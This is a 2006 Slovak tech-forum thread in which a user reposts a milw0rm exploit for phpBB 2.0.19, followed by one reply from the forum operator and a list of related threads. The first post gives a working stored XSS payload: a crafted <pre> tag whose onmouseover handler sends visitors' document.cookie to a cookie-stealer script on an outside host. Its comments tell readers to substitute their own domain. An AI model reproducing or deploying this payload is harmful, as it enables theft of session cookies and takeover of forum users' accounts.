[ Príspevkov: 2 ] 
AutorSpráva
Offline

Užívateľ
Užívateľ
Obrázok užívateľa

Registrovaný: 08.12.05
Prihlásený: 12.02.06
Príspevky: 1
Témy: 1 | 1
NapísalOffline : 12.02.2006 21:19 | exploit na phpbb 2.0.19

Kód:
# to be used with cookie stealer located here: http://www.milw0rm.com/id.php?id=1103
# Make sure you change www.milw0rm.com to your domain. thnx. /str0ke
# Author: threesixthousan

/*
As long as html is ON in the latest version of phpBB forums,
several XSS attack vectors are possible. phpBB incorrectly
filters in both messages and profiles, making cookie stealing,
and other XSS attacks possible. the exploit leads to arbitary
javascript execution, which in turn can lead to html defacement.

use of the <pre> tag means that the cursor must pass it in the y
direction only. e.g. the mouse only needs to cross a point
horrizontaly equal to the link in order for the javascript to be executed.

the following is a simple attack:
*/

<pre a='>' onmouseover='document.location="http://www.milw0rm.com/cookie_stealer.php?c="+document.cookie' b='<pre' >

[url]http://www.somesite.com/[/url]</pre>

# milw0rm.com [2006-01-29]


Offline

Prevádzkovateľ fóra
Prevádzkovateľ fóra
exploit na phpbb 2.0.19

Registrovaný: 01.05.05
Príspevky: 12425
Témy: 1447 | 1447
Bydlisko: Bratislava
Vek: 32
NapísalOffline : 12.02.2006 21:32 | exploit na phpbb 2.0.19

zajujimave ale mam pocit ze toto je mozne uplatnit len na forach s povolenym html zobrazovanim, ak sa nemylim


_________________
SilverStone SST CS01 | Corsair SF600 600W SFX | ASRock X99E-ITX/ac | Intel Xeon E5-2683 v4 (16 Cores / 32 Threads) & Noctua NH-U9DX i4 | Kingston HyperX Savage 32 GB DDR4 2400 MHz | PNY NVIDIA Quadro K1200 DP 4 GB DDR5 | Intel SSD 750 1.2 TB NVMe & Intel SSD 730 240 GB SATA & Seagate BackUp Plus Portable 12 TB USB | 31.5" 4K LCD EIZO FlexScan EV3237 & 2 x 24" LCD EIZO FlexScan EV2451 | Ergotron LX Wall Mount Keyboard Arm | Logitech Craft | Logitech Wireless G700s | Harman Kardon Nova | Microsoft Windows 7 Ultimate | APC Back-UPS ES 700 | Lenovo ThinkPad X250 - Intel Core i7 5600U, 8 GB DDR3 1600 MHz, Intel HD Graphics 5500, SanDisk SSD 512 GB, 12.5 FHD LED IPS, WWAN 3G 4G LTE, Microsoft Windows 7 Ultimate | Nintendo Classic Mini | BlackBerry Passport 96 GB
 [ Príspevkov: 2 ] 


exploit na phpbb 2.0.19



Podobné témy

 Témy  Odpovede  Zobrazenia  Posledný príspevok 
V tomto fóre nie sú ďalšie neprečítané témy.

Prechod z 2.0.19 --> 2.0.21

v Redakčné systémy

19

2034

27.06.2006 7:56

gumy

V tomto fóre nie sú ďalšie neprečítané témy.

Update z PHPBB 2.0.20 na PHPBB PLUS 1.53

v Redakčné systémy

5

644

31.08.2006 23:16

JanoF

V tomto fóre nie sú ďalšie neprečítané témy.

phpbb 2.0.20

v Redakčné systémy

18

2022

29.05.2006 9:39

gumy

V tomto fóre nie sú ďalšie neprečítané témy.

phpbb 2.0.20

v Redakčné systémy

15

2830

17.05.2006 20:25

gumy

V tomto fóre nie sú ďalšie neprečítané témy.

Upgrade phpBB 2.0.21

v Redakčné systémy

1

352

15.07.2007 20:25

Flety

V tomto fóre nie sú ďalšie neprečítané témy.

phpbb 2.0.22 - pocet poziadaviek

v Redakčné systémy

8

686

17.10.2009 0:53

chrono

V tomto fóre nie sú ďalšie neprečítané témy.

Critical Java 0-day exploit

v Novinky

6

238

03.09.2012 12:56

Xarxes

V tomto fóre nie sú ďalšie neprečítané témy.

zlúčenie tém v phpBB 2.0.22

v Redakčné systémy

6

704

22.09.2009 19:52

JanoF

V tomto fóre nie sú ďalšie neprečítané témy.

Radenie príspevkov v phpBB 2.0.22

v Redakčné systémy

5

1001

06.02.2008 14:54

polip4

V tomto fóre nie sú ďalšie neprečítané témy.

Hladam: Color groups pre phpBB 2.0.20

v Redakčné systémy

3

364

04.02.2007 10:01

joker

V tomto fóre nie sú ďalšie neprečítané témy.

Chyba v slovenskom preklade phpbb 2.0.x

v Redakčné systémy

1

367

27.04.2007 17:55

Tom@S

V tomto fóre nie sú ďalšie neprečítané témy.

PREKLAD: ezPortal for phpBB 2.0.x CZ

v Redakčné systémy

0

2683

12.11.2006 17:02

JanoF

V tomto fóre nie sú ďalšie neprečítané témy.

Help me - slovensky preklad na phpbb 2.0.21

v Redakčné systémy

2

465

04.01.2007 10:28

inekafe

V tomto fóre nie sú ďalšie neprečítané témy.

Skype 2.0.0.107 & 2.5.0.91 BETA

v Novinky

14

3690

06.09.2006 19:56

vandal666

V tomto fóre nie sú ďalšie neprečítané témy.

nezobrazuje mi fora v phpbb 3.0.0

v Redakčné systémy

4

765

24.01.2008 19:44

Kirk

V tomto fóre nie sú ďalšie neprečítané témy.

PHPBB 3.0.b4

v Redakčné systémy

7

501

20.12.2006 23:32

JanoF



© 2005 - 2017 PCforum, edited by JanoF